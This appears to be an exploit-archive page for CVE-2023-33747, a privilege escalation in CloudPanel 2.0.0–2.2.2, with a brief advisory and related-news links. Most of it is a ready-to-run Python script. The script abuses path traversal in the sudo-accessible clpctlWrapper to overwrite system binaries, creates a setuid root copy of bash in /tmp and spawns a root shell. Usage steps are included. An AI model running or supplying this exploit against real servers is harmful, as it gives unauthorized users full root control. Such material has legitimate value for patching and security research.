Headline
CloudPanel 2.2.2 Privilege Escalation / Path Traversal
CloudPanel versions 2.0.0 through 2.2.2 suffer from a privilege escalation vulnerability when a traversal is leveraged against clpctlWrapper for which all normal users have sudo access.
# Title : Privilege Escalation through path traversal# CVE ID : CVE-2023-33747# Exploit Author : EagleEye# Github : https://github.com/EagleTube/CloudPanel/tree/main/CVE-2023-33747# Version Affected : CloudPanel v2.0.0 - v2.2.2# Vendor : CloudPanel.io# Date : 31/05/2023 , 12:00 PM# Step : Login as ssh as user, and run `python3 CVE-2023-33747_GetRoot.py`# Date : 06 June 2023# CVE-2023-33747_GetRoot.pyimport osimport subprocessdef exec_command(command):process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)output, error = process.communicate()def exploit():print('[+] Overriding file to writable')exec_command('sudo /usr/bin/clpctlWrapper system:permissions:reset --files=777 --path=../../../../../../../../../../usr/bin/clpctlWrapper')print('[+] Backup clpctlWrapper into tmp...')exec_command('cp /usr/bin/clpctlWrapper /tmp/clpctlWrapper')print('[+] Replacing clpctlWrapper with cp...')exec_command('cp /bin/bash /tmp/bash')print('[+] Assigning suid to /tmp/bash...')exec_command('cp /bin/chown /usr/bin/clpctlWrapper')exec_command('sudo /usr/bin/clpctlWrapper root:root /tmp/bash')exec_command('cp /bin/chmod /usr/bin/clpctlWrapper')exec_command('sudo /usr/bin/clpctlWrapper 6755 /tmp/bash')exec_command('cp /tmp/clpctlWrapper /usr/bin/clpctlWrapper')print('[+] Popping root shell...')os.system('/tmp/bash -p -c "chown root:root /usr/bin/clpctlWrapper && chmod 0700 /usr/bin/clpctlWrapper && python3 root.py"')if __name__ == '__main__':exploit()# root.pyimport osos.setreuid(0,0)os.setregid(0,0)os.system('/bin/bash')
Related news
CVE-2023-35885: Changelog | CloudPanel | Documentation
CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication.
CVE-2023-33747: CWE-269: Improper Privilege Management (4.11)
CloudPanel v2.2.2 allows attackers to execute a path traversal.